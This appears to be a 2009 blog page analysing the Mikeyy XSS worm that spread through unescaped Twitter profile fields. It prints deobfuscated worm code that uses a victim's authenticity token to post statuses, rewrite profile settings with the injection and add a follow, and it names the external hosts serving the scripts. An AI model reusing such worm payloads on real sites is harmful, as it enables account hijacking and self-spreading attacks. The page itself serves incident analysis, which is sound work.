News from April, 2009
2009/04/12
Learnt about the worm this morning and didn't take to long to find an infected profile just by searching.
The cause is a silly bug in handing form input posted to the server that allows code injection.
After a quick examination on the source, I found the injected code in the obvious place, where you get to enter a URL in the profile:
But after examining the source found that the vulnerability is not the only on the URL but also on the decoration.
Look at the twitter colour design section:
Seems harmless, right? however, when the user selects the the colours they are submitted, and if the input is not properly escaped and validated, then it can be injected:
The actual injected code has been identified already but we might be talking about a variation.
In other words, the vulnerability can not only be in places where users can enter text, but whenever data is posted to the server. this means that other fields might be vulnerable.
We all make coding mistakes, but where I think twitter FAILED was in not fixing it properly when StalkDaily came up.
UPDATE 1
The injected code tries to load the scripts from content.ireel.com/jsxss.js which is scrambled but so far it looks like what has already been posted the only thing it changes is the messages shown:
_0x4c9d[38] Twitter should really fix this... Mikeyy _0x4c9d[39] I am done... Mikeyy _0x4c9d[40] Mikeyy is done.. _0x4c9d[41] Twitter please fix this, regards Mikeyy
UPDATE 2
It also try to load a script from bambamyo.110mb.com/wompwomp.js
I also found that he is more creative in his script and encodes the script injection twice...
As suspected, the code is injected in the profile URL and in the background colour:
var _0xcd6ax1c = new XHConn();
_0xcd6ax1c.connect("/status/update", "POST", "authenticity_token=" +
token + "&status=" + _0xcd6ax18 + "&return_rendered_status=true&twttr=true");
var _0xcd6ax1d = new XHConn();
_0xcd6ax1d.connect("/account/settings", "POST", "authenticity_token=" +
token + "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
var _0xcd6ax1e = new XHConn();
_0xcd6ax1e.connect("/account/profile_settings", "POST", "authenticity_token=" +
token + "&user[profile_default]=false&tab=none" +
"&profile_theme=0&user[profile_use_background_image]=0" +
"&user[profile_background_tile]" +
"=0&user[profile_link_color]=" + _0xcd6ax1b
+ "&commit=save+changes");
var _0xcd6ax1f = new XHConn();
_0xcd6ax1f.connect("/account/settings", "POST", "authenticity_token=" + token +
"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
var _0xcd6ax20 = new XHConn();
_0xcd6ax20.connect("/account/profile_settings", "POST", "authenticity_token=" +
token + "&user[profile_default]=false&tab=none&profile_theme=" +
"0&user[profile_use_background_image]=0&user[profile_background_tile]" +
"=0&user[profile_link_color]=" + _0xcd6ax1b + "&commit=save+changes");
var _0xcd6ax21 = new XHConn();
_0xcd6ax21.connect("/account/settings", "POST", "authenticity_token=" + token +
"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
As per above, it replaces the user's name with "Womp" + spaces.
UPDATE 3: The risks
So far the script does not cause major harm, but it could cause more damage such as posting the email address (which is confidential) or 'forgetting' the password.
There is not risk of getting the password changed as twitter requires to enter the current password, which is not available to the script.
2009/04/17
It's back, but this time it seems like they're jealous at Mikeyy getting a new job. Somebody hacked his site and actually stored the new XSS Script on it.
This script is now hosted at 74.200.253.195/xss.js, which according to this blog it used to host Mikeyy's servers (Haxyou.com, Michangelomooney.com and Stalkdaily.com). I tried to get the addresses but I've got server timeouts, probably the DNS servers for the domains were changed too, that's why the script uses the ip address instead of the host name.
What's new is that the script exploits another field that is not validated, meaning that Twitter have not cleaned up their mess. as I've pointed out they have to look at every posted request.
var _0x4874x1b = new XHConn();
_0x4874x1b.connect("/status/update", "POST",
"authenticity_token=" +
_0x4874x15 + "&status=" + _0x4874x1a +
"&return_rendered_status=true&twttr=true");
var _0x4874x1c = new XHConn();
_0x4874x1c.connect("/account/settings", "POST",
"authenticity_token=" + _0x4874x15 +
"&user[name]=" + bypassEncode +
"&user[url]=" + bypassEncode +
"&user[description]=" + bypassEncode +
"&user[location]=" + bypassEncode +
"&user[protected]=0&commit=Save");
var _0x4874x1d = new XHConn();
_0x4874x1d.connect("/account/profile_settings", "POST",
"authenticity_token=" +
_0x4874x15 + "&user[profile_sidebar_border_color]=" +
xss + " &commit=save+changes");
var _0x4874x1e = new XHConn();
_0x4874x1e.connect("/friendships/create/32336151", "POST",
"authenticity_token=" + _0x4874x15 + "&twttr=true");
The code is injected in the profile side bar color. What's funny too is that it adds a friendship to user # 32336151... haven't figured out who is...
|
April 2009 |
|
||||
|---|---|---|---|---|---|---|
| Sun | Mon | Tue | Wed | Thu | Fri | Sat |
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | ||
Apr 17, 2009
Apr 12, 2009